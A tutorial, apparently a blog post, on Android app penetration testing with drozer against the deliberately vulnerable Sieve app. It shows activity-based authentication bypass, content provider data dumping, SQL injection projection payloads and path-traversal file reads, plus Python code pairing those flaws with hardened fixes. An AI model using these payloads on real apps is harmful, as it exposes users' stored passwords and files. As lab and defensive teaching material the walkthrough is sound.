iOS/Android Vulnerability Hunting (Part 1)

Status: to be expanded

0x00 Preface

More and more businesses now run only as an app, the grey-market porn ("hs") and gambling ("bc") operations included. The original approach to app pentesting was limited to reading the decompiled source and bypassing anti-capture measures so the traffic could be intercepted and modified. Apps have since caught up: every request now carries a timestamp or key and the whole payload is encrypted and decrypted in transit. With the right tools or frameworks we can automatically discover hard-coded keys and vulnerabilities, and also tamper with data before it is encrypted.

0x01 Drozer (Android), from F-Secure Labs

F-Secure Labs also has a well-known tool called C3, one more C than C2.

Drozer project page: https://labs.f-secure.com/tools/drozer/

https://github.com/FSecureLABS/drozer/tree/master

Requirements

Python 2.7
Note: on Windows, make sure the Python install directory and its Scripts folder are on the PATH.
Protobuf 2.6 or later
pyOpenSSL 16.2 or later
Twisted 10.2 or later
Java Development Kit 1.7
Note: on Windows, make sure the directory containing javac.exe is on the PATH.
Android Debug Bridge (adb)

Environment setup

  1. Install an emulator and adb

    LDPlayer (雷电模拟器) is recommended; it can run inside a virtual machine.

  2. Install Python 2.7 and the drozer MSI

    https://github.com/mwrlabs/drozer/releases/download/2.4.4/drozer-2.4.4.win32.msi

    https://www.python.org/ftp/python/2.7.18/python-2.7.18.amd64.msi

    python -m pip install pyOpenSSL
    python -m pip install "protobuf>=2.6"
    python -m pip install twisted

    Do not pin protobuf to an older release; the requirements above call for 2.6 or later.
    
  3. Download the drozer agent APK and a password-manager app (Sieve) to use as the test target

    https://github.com/mwrlabs/drozer/releases/download/2.3.4/sieve.apk

    https://github.com/mwrlabs/drozer/releases/download/2.3.4/drozer-agent-2.3.4.apk

  4. Install both with adb

    adb install drozer-agent-2.3.4.apk
    adb install sieve.apk

  5. Open the drozer agent app and switch on its embedded server

    The agent listens on TCP port 31415 by default; that is the port forwarded in the next step.

  6. Forward the port with adb and connect

    adb forward tcp:31415 tcp:31415
    drozer console connect

    On Windows the drozer launcher is installed under C:\Python27\Scripts\drozer; run it from there or add that folder to the PATH.

  7. Initial setup of the sample app

    On first launch Sieve asks for a 16-character master password and a PIN. The values used in this walkthrough:

    pass:abcdefghijklmnop
    pin:2411

  8. Setup is complete; now we can start using drozer in practice.

Worked tests

  1. List packages, inspect the package, determine the attack surface

    dz> run app.package.list -f media            (list packages matching "media")
    com.android.providers.media (Media Storage)
    dz> run app.package.list -f sieve            (list packages matching "sieve")
    com.mwr.example.sieve (Sieve)
    dz> run app.package.info -a com.mwr.example.sieve   (package details)
    Package: com.mwr.example.sieve
      Application Label: Sieve
      Process Name: com.mwr.example.sieve
      Version: 1.0
      Data Directory: /data/data/com.mwr.example.sieve
      APK Path: /data/app/com.mwr.example.sieve-1/base.apk
      UID: 10028
      GID: [1028, 1015, 3003]
      Shared Libraries: null
      Shared User ID: null
      Uses Permissions:
      - android.permission.READ_EXTERNAL_STORAGE
      - android.permission.WRITE_EXTERNAL_STORAGE
      - android.permission.INTERNET
      Defines Permissions:
      - com.mwr.example.sieve.READ_KEYS
      - com.mwr.example.sieve.WRITE_KEYS

    dz> run app.package.attacksurface com.mwr.example.sieve   (attack surface)
    Attack Surface:
      3 activities exported
      0 broadcast receivers exported
      2 content providers exported
      2 services exported
        is debuggable
    dz>

    Exported components are the ones any other app on the device can reach directly, and the drozer agent is just such an ordinary unprivileged app, so they are the attack surface. A debuggable build additionally lets anyone with adb access attach a debugger or use run-as to execute commands under the app's UID.
    
  2. Inspect the exported components

    run app.activity.info -a com.mwr.example.sieve

    This lists the app's exported activities together with any permission guarding them (add -u to include unexported ones). The same query exists for the other component types: app.service.info, app.provider.info and app.broadcast.info.
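To make explicit what app.package.attacksurface in step 1 and app.activity.info in step 2 are computing, here is an added example (my own code, not part of the original post and not drozer's code) that reads an AndroidManifest.xml and applies the platform's export rules: a component is exported if it declares android:exported="true"; if the attribute is absent, a component with an <intent-filter> is exported, and a <provider> with neither is exported by default only when minSdkVersion is below 17. The manifest embedded below is constructed, not Sieve's real one; it is shaped to reproduce the counts drozer prints for Sieve, and component names other than PWList, DBContentProvider and FileBackupProvider are assumptions.

```python
import xml.etree.ElementTree as ET

ANDROID_NS = "http://schemas.android.com/apk/res/android"

# Constructed manifest (not the real Sieve manifest): three exported activities,
# two exported providers, two exported services, no exported receiver, debuggable.
SAMPLE_MANIFEST = """<manifest xmlns:android="http://schemas.android.com/apk/res/android"
          package="com.mwr.example.sieve">
  <uses-sdk android:minSdkVersion="8" android:targetSdkVersion="17"/>
  <permission android:name="com.mwr.example.sieve.READ_KEYS"
              android:protectionLevel="dangerous"/>
  <application android:label="Sieve" android:debuggable="true">
    <activity android:name=".MainLoginActivity">
      <intent-filter>
        <action android:name="android.intent.action.MAIN"/>
        <category android:name="android.intent.category.LAUNCHER"/>
      </intent-filter>
    </activity>
    <activity android:name=".PWList" android:exported="true"/>
    <activity android:name=".FileSelectActivity" android:exported="true"/>
    <activity android:name=".AddEntryActivity"/>
    <service android:name=".AuthService" android:exported="true"/>
    <service android:name=".CryptoService" android:exported="true"/>
    <receiver android:name=".BootReceiver" android:exported="false"/>
    <provider android:name=".DBContentProvider"
              android:authorities="com.mwr.example.sieve.DBContentProvider"
              android:exported="true"/>
    <provider android:name=".FileBackupProvider"
              android:authorities="com.mwr.example.sieve.FileBackupProvider"
              android:exported="true"/>
  </application>
</manifest>
"""


def android_attr(element, name):
    """Read an android:-namespaced attribute, or None if it is absent."""
    return element.get("{%s}%s" % (ANDROID_NS, name))


def exported_by_default(tag, has_intent_filter, min_sdk):
    """Default applied when android:exported is not written (pre-API 31 rules;
    from API 31 the platform demands an explicit value for filtered components)."""
    if tag == "provider":
        return min_sdk < 17
    return has_intent_filter


def is_exported(component, min_sdk):
    explicit = android_attr(component, "exported")
    if explicit is not None:
        return explicit.lower() == "true"
    return exported_by_default(component.tag,
                               component.find("intent-filter") is not None,
                               min_sdk)


def attack_surface(manifest_xml):
    """Count exported components per type, the way drozer summarises them."""
    root = ET.fromstring(manifest_xml)
    uses_sdk = root.find("uses-sdk")
    min_sdk = 1
    if uses_sdk is not None and android_attr(uses_sdk, "minSdkVersion"):
        min_sdk = int(android_attr(uses_sdk, "minSdkVersion"))
    app = root.find("application")
    counts = {"activity": 0, "receiver": 0, "provider": 0, "service": 0}
    exported = []
    for component in app:  # direct children of <application> only
        if component.tag in counts and is_exported(component, min_sdk):
            counts[component.tag] += 1
            exported.append((component.tag,
                             android_attr(component, "name"),
                             android_attr(component, "permission")))
    return {"counts": counts, "exported": exported,
            "debuggable": android_attr(app, "debuggable") == "true"}


def format_report(surface):
    """Render in the same shape as drozer's app.package.attacksurface output."""
    c = surface["counts"]
    lines = ["Attack Surface:",
             "  %d activities exported" % c["activity"],
             "  %d broadcast receivers exported" % c["receiver"],
             "  %d content providers exported" % c["provider"],
             "  %d services exported" % c["service"]]
    if surface["debuggable"]:
        lines.append("    is debuggable")
    for tag, name, perm in surface["exported"]:
        guard = " (requires %s)" % perm if perm else ""
        lines.append("      %s %s%s" % (tag, name, guard))
    return "\n".join(lines)


if __name__ == "__main__":
    print(format_report(attack_surface(SAMPLE_MANIFEST)))
```

A real APK carries its manifest in binary form, so dump it to text first (aapt dump xmltree or apktool) before feeding it in. Drozer asks the device's package manager instead, which is authoritative; this static version is useful for triage before an app is ever installed, and for seeing why a component without an explicit android:exported ends up reachable.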

  3. Authentication bypass through an exported activity

    run app.activity.start --component com.mwr.example.sieve com.mwr.example.sieve.PWList

    PWList is the screen that displays the stored passwords and normally sits behind the login activity. Because it is exported, any app on the device can start it directly with an intent, and the password list appears without the master password ever being entered.

  4. Scanning for information leaks

    run scanner.provider.finduris -a com.mwr.example.sieve
    run app.provider.query content://com.mwr.example.sieve.DBContentProvider/Keys/
    run app.provider.query content://com.mwr.example.sieve.DBContentProvider/Passwords/

    scanner.provider.finduris enumerates the content URIs the app's exported providers will answer; querying the Keys/ and Passwords/ URIs then dumps the stored rows to any caller, with no authentication involved.

  5. SQL injection at the password query

    run app.provider.query content://com.mwr.example.sieve.DBContentProvider/Passwords/ --projection "'"
    run app.provider.query content://com.mwr.example.sieve.DBContentProvider/Passwords/ --selection "'"
    run app.provider.query content://com.mwr.example.sieve.DBContentProvider/Passwords/ --projection "* FROM SQLITE_MASTER WHERE type='table';--"
    run app.provider.query content://com.mwr.example.sieve.DBContentProvider/Passwords/ --projection "* FROM Passwords;--"

    A lone quote in the projection or the selection comes back as a SQLite syntax error, which shows both values are concatenated into the query unescaped. The third command uses the projection to rewrite the SELECT and list the database's tables from SQLITE_MASTER; the fourth reads a table of your choice the same way, with ;-- discarding whatever the provider appends after the projection.

  6. Database operations on the app

    run scanner.provider.injection -a com.mwr.example.sieve
    run scanner.provider.sqltables -a com.mwr.example.sieve

    The first scans every content URI the app exposes for injection points; the second lists the tables in the app's database. Together they automate step 5.
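Why the projection payloads in step 5 work, and what the scanners in step 6 are looking for: a provider built on SQLiteQueryBuilder forms SELECT <projection> FROM <table> WHERE (<selection>) by string concatenation, so whatever the caller passes as a projection lands in the statement unescaped. The following is an added example (my own Python, not code from the post or from Sieve) that rebuilds that statement construction over an in-memory SQLite database, replays the page's payloads against it, and then shows the hardened form: a fixed column allowlist for the projection and a bound parameter for the filter, the same idea as setProjectionMap() and setStrict() on SQLiteQueryBuilder. The schema and rows are constructed; table names follow what drozer lists for Sieve (Key, Passwords) and the column names are assumptions.

```python
import sqlite3


def build_db():
    """Constructed stand-in for the app's database (contents are made up)."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE Key (Password TEXT, pin INTEGER);
        CREATE TABLE Passwords (_id INTEGER PRIMARY KEY, service TEXT,
                                username TEXT, password BLOB, email TEXT);
        INSERT INTO Key VALUES ('abcdefghijklmnop', 2411);
        INSERT INTO Passwords VALUES (1, 'Gmail', 'alice', X'DEADBEEF', 'alice@example.com');
        INSERT INTO Passwords VALUES (2, 'Bank',  'bob',   X'CAFEBABE', 'bob@example.com');
    """)
    return conn


# content://.../DBContentProvider/<segment>/ -> backing table
TABLE_FOR_SEGMENT = {"Passwords": "Passwords", "Keys": "Key"}


def vulnerable_query(conn, segment, projection=None, selection=None):
    """Mimics SQLiteQueryBuilder.buildQuery(): the caller's projection and
    selection strings are pasted straight into the SQL text."""
    table = TABLE_FOR_SEGMENT[segment]
    columns = ", ".join(projection) if projection else "*"
    sql = "SELECT %s FROM %s" % (columns, table)
    if selection:
        sql += " WHERE (%s)" % selection
    try:
        return {"sql": sql, "rows": conn.execute(sql).fetchall(), "error": None}
    except sqlite3.Error as exc:  # a syntax error is the injection tell-tale
        return {"sql": sql, "rows": [], "error": str(exc)}


# Hardened form: only named columns may be selected, only one equality filter
# with a bound parameter is accepted, and the Key table is never reachable.
ALLOWED_COLUMNS = {
    "Passwords": ("_id", "service", "username", "email"),  # 'password' deliberately absent
    "Key": (),
}


def hardened_query(conn, segment, projection=None, where_column=None, where_value=None):
    table = TABLE_FOR_SEGMENT[segment]
    allowed = ALLOWED_COLUMNS[table]
    columns = tuple(projection) if projection else allowed
    if not allowed or any(c not in allowed for c in columns):
        return {"sql": None, "rows": [], "error": "rejected: projection outside allowlist"}
    sql = "SELECT %s FROM %s" % (", ".join(columns), table)
    params = ()
    if where_column is not None:
        if where_column not in allowed:
            return {"sql": None, "rows": [], "error": "rejected: filter column outside allowlist"}
        sql += " WHERE %s = ?" % where_column  # value travels as a bound parameter
        params = (where_value,)
    return {"sql": sql, "rows": conn.execute(sql, params).fetchall(), "error": None}


def replay_page_payloads(conn):
    """The probes from step 5, as drozer's app.provider.query would send them."""
    return {
        "quote_in_projection": vulnerable_query(conn, "Passwords", ["'"]),
        "quote_in_selection": vulnerable_query(conn, "Passwords", selection="'"),
        "list_tables": vulnerable_query(conn, "Passwords",
                                        ["* FROM SQLITE_MASTER WHERE type='table';--"]),
        "read_key_table": vulnerable_query(conn, "Passwords", ["* FROM Key;--"]),
    }


if __name__ == "__main__":
    db = build_db()
    for name, result in replay_page_payloads(db).items():
        print(name, "->", result["sql"], "|", result["error"] or result["rows"])
    print(hardened_query(db, "Passwords", ["* FROM Key;--"])["error"])
```

Note that the read_key_table probe goes through the Passwords URI yet returns the master password and PIN: once the projection is attacker-controlled, the path segment no longer decides which table is read, which is why the scanners in step 6 test every URI. The allowlist fixes that inside the provider; the other half of the fix, outside the scope of this snippet, is not exporting the provider at all or guarding it with a signature-level permission.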

  7. File operations

    run app.provider.download content://com.mwr.example.sieve.FileBackupProvider/data <local-destination>
    run app.provider.read content://com.mwr.example.sieve.FileBackupProvider/etc/hosts
    run scanner.provider.traversal -a com.mwr.example.sieve

    app.provider.download copies a file served by the provider to a local path given as its second argument (shown above as a placeholder), for example the app's SQLite database under /data/data/com.mwr.example.sieve/databases; app.provider.read prints the file instead. The /etc/hosts read succeeding shows that FileBackupProvider passes the URI path straight through to the filesystem, so any file readable by the app's UID can be fetched. scanner.provider.traversal tests the app's providers for this class of path traversal automatically.
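What the /etc/hosts read in step 7 tells you is that a file-backed provider whose openFile() does new File(uri.getPath()) serves whatever path the URI names, so the URI path simply becomes an absolute filesystem path. The added example below (my own Python, not code from the post or from Sieve) reproduces that resolution beside a hardened version that anchors every request under the app's own directory, canonicalises the result and refuses anything that escapes the root, including .. segments and their percent-encoded forms (Uri.getPath() decodes those before the provider sees them, so the check has to decode as well). The root directory is the app's Data Directory from step 1 plus a files subfolder, an assumption; the probe URIs are constructed.

```python
import os
from urllib.parse import urlsplit, unquote

# App-private directory the provider is meant to serve from (assumed path,
# built from the Data Directory drozer prints for Sieve).
APP_FILES_ROOT = "/data/data/com.mwr.example.sieve/files"


def uri_path(content_uri):
    """Equivalent of android.net.Uri.getPath(): the path part, percent-decoded."""
    return unquote(urlsplit(content_uri).path)


def vulnerable_open_path(content_uri):
    """FileBackupProvider-style resolution: the URI path *is* the file path."""
    return uri_path(content_uri)


def resolve_in_root(content_uri, root=APP_FILES_ROOT):
    """Hardened resolution. Returns (allowed, resolved_path).

    The request is treated as relative to `root`, canonicalised with realpath
    (collapses '..' and follows symlinks) and then required to still lie
    strictly under the canonical root. Anything else is refused, not served.
    """
    root_real = os.path.realpath(root)
    relative = uri_path(content_uri).lstrip("/")  # never let the URI supply an absolute path
    candidate = os.path.realpath(os.path.join(root_real, relative))
    inside = os.path.commonpath([root_real, candidate]) == root_real
    allowed = inside and candidate != root_real   # the root directory itself is not a file
    return allowed, candidate


# Constructed probes: the page's /etc/hosts read, a legitimate backup file,
# a classic dot-dot escape and its percent-encoded twin.
PROBES = [
    "content://com.mwr.example.sieve.FileBackupProvider/etc/hosts",
    "content://com.mwr.example.sieve.FileBackupProvider/backup.db",
    "content://com.mwr.example.sieve.FileBackupProvider/../../../../etc/hosts",
    "content://com.mwr.example.sieve.FileBackupProvider/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/hosts",
]


def probe(content_uris, root=APP_FILES_ROOT):
    """Run both resolvers over a list of URIs to compare their answers."""
    return [(uri, vulnerable_open_path(uri), resolve_in_root(uri, root))
            for uri in content_uris]


if __name__ == "__main__":
    for uri, naive, (ok, safe) in probe(PROBES):
        print("%s\n  naive   -> %s\n  guarded -> %s %s"
              % (uri, naive, "ALLOW" if ok else "DENY", safe))
```

Under the guarded resolver the page's /etc/hosts request is not an error: it is answered from <root>/etc/hosts, which does not exist, instead of from the real system file. On Android the equivalent of this guard comes for free from FileProvider, which only maps configured subdirectories; a hand-written provider that exposes files should either use that or be kept unexported.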

0x02 Needle (iOS), from F-Secure Labs

Needle project page: https://labs.f-secure.com/tools/needle/

https://github.com/FSecureLABS/needle-agent

The framework is no longer maintained; its last update was in 2018.

Scrounger, an alternative framework (write-up on FreeBuf):

https://www.freebuf.com/sectool/182888.html
